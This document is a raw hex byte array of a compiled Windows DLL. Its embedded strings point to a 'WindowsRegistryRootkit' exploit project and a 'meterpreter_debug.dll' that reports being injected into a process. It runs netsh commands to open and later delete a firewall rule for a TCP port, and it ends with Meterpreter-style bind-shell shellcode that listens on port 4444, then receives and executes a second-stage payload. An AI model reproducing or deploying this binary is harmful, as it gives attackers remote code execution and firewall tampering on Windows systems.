0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00, 0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47, 0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8, 0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c, 0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff, 0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08, 0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c, 0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72, 0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4, 0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00, 0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20, 0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54, 0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15, 0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22, 0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc, 0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52, 0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50, 0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a, 0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68, 0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e, 0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00, 0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50, 0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8, 0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02, 0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15, 0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc, 0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b, 0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00, 0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57, 0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc, 0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84, 0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44, 0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10, 0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84, 0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6, 0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53, 0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8, 0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0, 0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85, 0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3, 0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24, 0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff, 0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10, 0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a, 0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00, 0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15, 0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d, 0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc, 0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20, 0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25, 0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10, 0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20, 0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25, 0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10, 0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20, 0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25, 0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10, 0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00, 0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00, 0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00, 0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00, 0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00, 0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, 0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e, 0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64, 0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64, 0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75, 0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20, 0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20, 0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c, 0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e, 0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62, 0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64, 0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c, 0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61, 0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41, 0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77, 0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68, 0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72, 0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c, 0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28, 0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f, 0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50, 0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22, 0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68, 0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e, 0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69, 0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63, 0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e, 0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20, 0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00, 0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00, 0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00, 0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00, 0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00, 0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00, 0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00, 0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46, 0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72, 0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c, 0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c, 0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65, 0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61, 0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65, 0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72, 0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72, 0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04, 0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00, 0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c, 0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65, 0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00, 0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00, 0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72, 0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65, 0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00, 0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73, 0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41, 0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65, 0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32, 0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64, 0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00, 0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00, 0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00, 0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65, 0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00, 0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac, 0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f, 0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c, 0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52, 0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72, 0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b, 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57, 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01, 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4, 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24, 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d, 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07, 0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00, 0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff, 0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57, 0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5, 0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d, 0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53, 0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 